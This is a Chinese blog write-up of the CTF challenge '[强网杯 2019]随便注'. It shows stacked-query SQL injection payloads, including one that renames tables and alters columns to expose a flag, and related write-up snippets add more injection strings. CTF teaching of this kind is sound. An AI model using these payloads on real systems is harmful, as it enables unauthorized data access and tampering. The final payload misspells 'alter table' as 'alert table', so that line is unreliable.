[强网杯 2019]随便注 1

最新推荐文章于 2024-04-07 15:17:11 发布
最新推荐文章于 2024-04-07 15:17:11 发布
阅读量808 收藏 4
点赞数 3
分类专栏: 比赛wp 文章标签: mysql 数据库 sql sqlserver java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/113487784
版权

判断注入点

万能密码先一搞
在这里插入图片描述
没啥用但是有回显

查询字段数

使用order by来操作
从1试到3,发现3有错误提示,说明有两个字段
在这里插入图片描述
在表中随便输入一个查询语句发现很多的语句被过滤
在这里插入图片描述
看wp准备使用堆叠注入

堆叠注入

直接看表
在这里插入图片描述
再看每个表的定义
第一个表就出现flag四个字

1' ; desc `1919810931114514`;#

(注意数字加引号,数字串为表名的表操作时要加反引号)
在这里插入图片描述

1' ;desc words;#

在这里插入图片描述

第一个数字表里面明显有我想要的flag,但是select语句被屏蔽掉了,不能直接通过堆叠查到

那我们换一个思路:
看了上面的回显,什么nonono,还是上面这些代码,肯定不是数字表里给的,数字表就一个字段放flag,所以肯定是words给的回显,换句话说:网站给的查询语句就是往words表里面查询的,可以猜测这个语句可能是这样

select id,data from `words` where id = '1';

给一个输入,匹配到一种输出刚好符合两个字段的words表

看了wp后,有一个改表名的操作,既然他sql语句就选择了words,那我们换个头呗,把我想要的数字表名字改成words,这样他sql选择的就是带有flag的表了
下面是涉及到的语法
表改名:alter table 表名 rename [to] 新的表名;
字段改名:alter table 表名 change [column] 旧的字段名 目标字段定义(不仅是名字,也可以有类型、大小之类的...) [first|after 字段名];
增加表字段:alter table 表名 add [column] 字段定义 [first|after 字段名];

然后就把数字表伪造成原来的words表来配合sql语句

rename table `words` to `word`; # 防止重名先把原表名words改成其他的
rename table `1919810931114514` to `words`;# 把数字表改成words
alter table `words` add id int(10); # 因为原words有两个字段id和data,所以要再加一个id字段
alert table words change flag data varchar(20); # 把字段名flag改成data,照着之前查到的改

payload就是

1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` add id int(10);alert table words change flag data varchar(20);#

操作完后再使用万能密码,flag就出来了
在这里插入图片描述

huamanggg
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3964
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 2062
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
[强网杯 2019]随便1
m0_75178803的博客
11-05 214
打开题目输入1输入1',页面报错,输入1' #页面正常说明1为入点且入方式为字符型的单引号入判断列名输入1' order by 2 # 页面正常1' order by 3 #页面报错说明列名字段数为2接下来我们尝试用联合入的方式爆出数据显示位输入1' union select 1,2 #可以看到过滤了很多东西说明我们用不了联合入,因为过滤了union我们尝试堆叠入来查看有多少个数据库1';我们查看表名1';可以看到当前数据库下有两个表1';
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
web buuctf [强网杯 2019]随便1
weixin_44214568的博客
07-31 342
1.简单随便填个 1 2.输入 1' 再尝试输入 1' # 有输出,证明确实存在sql入; 3.常用入 a. 1' or 1=1;# b.依次试1' order by 1;# 依次试1' order by 2;# 1' order by 3;# 证明只有两个字段; 4.利用 union select 进行联合查询 1’ union select 1,2;# 正则表达式,难搞哦 5.利用堆叠入 堆叠入原理: 在SQL...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 960
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 283
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
buuctf web题解之[强网杯 2019]随便1详解,网络安全开发了解这些自然无惧面试
最新发布
m0_60666841的博客
04-07 269
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
[强网杯 2019]随便-1
qq_51553814的博客
07-25 190
进入题打开靶场 既然是入,那么先判断入类型。 很容易就可以看出属于字符型入并且字段为2 正常开始入 发现大部分字符都被禁用了 于是使用堆叠入 成功查到所有库的信息,说明堆叠入是可以用的 再看看当前库里的表 show tables; 接着进入一个一个进入表中看看,如果这两个表都没有就必须得去别的库看看了 0’;desc 1919810931114514;# 很明显,有我们想要的flag 说明flag就在这里面 我们再返回查询word 里面有id,有data,而且正好是2个字段,所以猜测数据
[强网杯 2019]随便
AiNi5zu的博客
10-10 1997
看到了sqlmap没有灵魂盲猜是sql入 布尔盲(不太会 length(database()) 判断数据库名长度 得到了长度为9 ascii(substr(database(),1,1)) = 115 --+ 得到第一位 s 第二位 u 第三位 p 第四位 e 第五位 r 第六位 s 第七位 q 第八位 l 第九位 I Supersqli 方法错误!!! 堆叠入 Payload : ';show databases;# 显示所有...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值